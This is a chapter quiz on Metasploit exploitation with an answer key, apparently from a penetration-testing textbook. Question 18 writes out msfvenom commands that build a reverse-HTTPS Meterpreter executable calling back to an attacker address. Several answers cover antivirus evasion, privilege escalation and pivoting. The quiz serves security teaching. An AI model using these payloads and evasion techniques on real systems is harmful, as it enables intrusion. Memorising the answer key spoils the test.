Chapter 12: Quiz — Exploitation Fundamentals and Metasploit

Test your understanding of exploitation concepts and the Metasploit Framework. Select the best answer for each question.


Question 1. What is the primary difference between a "stager" and a "stage" in Metasploit's payload architecture?

A) A stager runs on the attacker's machine; a stage runs on the target
B) A stager is a small payload that downloads the larger stage to the target
C) A stage executes first to prepare the environment for the stager
D) Stagers are encrypted; stages are not


Question 2. Which Metasploit exploit ranking indicates that the exploit will never crash the target service?

A) GreatRanking
B) GoodRanking
C) ExcellentRanking
D) NormalRanking


Question 3. You are testing a system behind a firewall that blocks all inbound connections but allows outbound HTTPS. Which payload type is most appropriate?

A) windows/x64/meterpreter/bind_tcp
B) windows/x64/meterpreter/reverse_https
C) windows/x64/shell/bind_tcp
D) windows/x64/meterpreter/reverse_tcp


Question 4. What is the purpose of the check command in Metasploit?

A) To verify your Metasploit installation is up to date
B) To test whether the target is likely vulnerable without exploiting it
C) To check if your payload can evade antivirus
D) To verify database connectivity


Question 5. Which Meterpreter feature makes it particularly difficult for traditional antivirus to detect?

A) It uses strong encryption for all communications
B) It runs entirely in memory without writing files to disk
C) It mimics legitimate Windows services
D) It uses polymorphic encoding to change its signature


Question 6. What does the getsystem command in Meterpreter attempt to do?

A) Display detailed system information
B) Restart the target system
C) Escalate privileges to NT AUTHORITY\SYSTEM
D) Create a persistent backdoor


Question 7. In Metasploit, what is the purpose of the multi/handler module?

A) To manage multiple exploits simultaneously
B) To listen for incoming connections from reverse payloads
C) To handle multi-threaded scanning operations
D) To load multiple post-exploitation modules


Question 8. Which of the following is NOT a valid Metasploit module type?

A) Exploit
B) Auxiliary
C) Rootkit
D) Evasion


Question 9. You have obtained a Meterpreter session on a server that has access to an internal network segment (192.168.1.0/24) that your attack machine cannot reach. What Meterpreter feature allows you to scan this network?

A) Port forwarding
B) Process migration
C) Pivoting via autoroute
D) Session backgrounding


Question 10. What is the shikata_ga_nai encoder primarily used for?

A) Compressing payloads to fit in smaller buffers
B) Polymorphic XOR encoding to evade signature-based detection
C) Encrypting C2 communications
D) Encoding payloads for transmission over HTTP


Question 11. What must you ALWAYS obtain before conducting exploitation activities during a penetration test?

A) CVE numbers for all vulnerabilities to be exploited
B) Signed Rules of Engagement with explicit authorization
C) A zero-day exploit for the target system
D) Root access to the target's network infrastructure


Question 12. Which Metasploit command imports results from third-party scanning tools?

A) db_import
B) load_scan
C) import_results
D) scan_import


Question 13. When exploiting a healthcare system like MedSecure, what additional consideration is paramount compared to a standard corporate target?

A) Healthcare systems are typically easier to exploit
B) HIPAA requires all penetration tests to be reported to the government
C) System crashes could impact patient safety and care
D) Healthcare networks never have firewalls


Question 14. What is the purpose of Metasploit workspaces?

A) To provide different user interfaces for different skill levels
B) To separate data from different engagements and prevent cross-contamination
C) To allow multiple users to run exploits simultaneously
D) To manage different versions of the Metasploit Framework


Question 15. You are writing a custom Metasploit module. Which programming language must it be written in?

A) Python
B) C
C) Ruby
D) Perl


Question 16. What exploit mitigation technique randomizes the base addresses of the stack, heap, and libraries in memory?

A) DEP (Data Execution Prevention)
B) Stack Canaries
C) ASLR (Address Space Layout Randomization)
D) CFI (Control Flow Integrity)


Question 17. After successfully exploiting a target during an authorized penetration test, which action should you take FIRST?

A) Immediately attempt to escalate privileges
B) Document the timestamp, technique, and evidence of the exploitation
C) Install a persistent backdoor for future access
D) Begin scanning for additional targets on the network


Question 18. Which msfvenom command would generate a Windows x64 Meterpreter reverse HTTPS payload as an EXE file?

A) msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.0.0.5 LPORT=443 -f exe -o payload.exe
B) msfvenom -p windows/meterpreter/reverse_https LHOST=10.0.0.5 LPORT=443 -f exe -o payload.exe
C) msfvenom -e windows/x64/meterpreter/reverse_https LHOST=10.0.0.5 LPORT=443 -f exe -o payload.exe
D) msfvenom -p windows/x64/shell/reverse_https LHOST=10.0.0.5 LPORT=443 -f raw -o payload.exe


Answer Key

  1. B — A stager is a small initial payload that establishes a communication channel and downloads the larger stage (e.g., Meterpreter). This two-phase approach allows the exploit to use a small buffer for the stager while delivering full functionality via the stage.

  2. C — ExcellentRanking (600) indicates the exploit will never crash the service. These are typically SQL injection, command injection, or other logic-based exploits that do not risk destabilizing the target.

  3. B — reverse_https has the target make an outbound HTTPS connection to the attacker. Since the firewall blocks inbound connections (ruling out bind payloads) but allows outbound HTTPS, this payload will work and blend with legitimate traffic.

  4. B — The check command probes the target to determine if it is vulnerable without actually sending the exploit payload. Not all modules support it, but it should always be tried first, especially in sensitive environments.

  5. B — Meterpreter runs entirely in memory (in-process), never writing files to disk during normal operation. Traditional antivirus relies heavily on file-based scanning, making in-memory payloads harder to detect.

  6. C — The getsystem command attempts multiple privilege escalation techniques (named pipe impersonation, token duplication) to escalate from a lower-privilege user to NT AUTHORITY\SYSTEM—the highest privilege level on Windows.

  7. B — The multi/handler module is a generic listener that catches incoming connections from reverse payloads. It can handle various payload types and is essential when delivering payloads outside the normal exploit workflow.

  8. C — Rootkit is not a Metasploit module type. The valid module types are: Exploit, Auxiliary, Post, Payload, Encoder, Nop, and Evasion.

  9. C — Pivoting via autoroute (or manual route add) directs Metasploit traffic through the compromised session to reach otherwise inaccessible network segments. Port forwarding handles individual ports, not entire network scans.

  10. B — Shikata_ga_nai is a polymorphic XOR additive feedback encoder. Each encoded payload is unique, making it difficult for signature-based detection to identify. However, it does not defeat behavioral detection.

  11. B — Signed Rules of Engagement (RoE) documenting explicit written authorization is the absolute prerequisite for any exploitation activity. Operating without proper authorization constitutes a criminal offense.

  12. A — The db_import command imports results from various scanning tools including Nmap XML, Nessus, and OpenVAS into the Metasploit database.

  13. C — In healthcare environments, system crashes can directly impact patient safety. A crashed patient monitoring system or medication dispensing system could have life-threatening consequences, making stability paramount.

  14. B — Workspaces isolate data from different engagements. Each workspace maintains separate host, service, credential, and loot databases, preventing accidental data leakage between clients or projects.

  15. C — Metasploit modules are written in Ruby. The framework was rewritten in Ruby for version 3.0, and all modules use Ruby with the Metasploit module API.

  16. C — ASLR randomizes the memory layout of processes, making it difficult for exploits to predict where code and data reside. DEP prevents code execution in data areas, stack canaries detect buffer overflows, and CFI restricts control flow.

  17. B — Documentation should be the first action after any significant event during a penetration test. Timestamps, techniques, and evidence must be recorded while fresh. Further exploitation can proceed after documentation.

  18. A — The correct syntax specifies the full x64 payload path, uses -p for payload, includes LHOST and LPORT options, and uses -f exe for the output format with -o for the output file.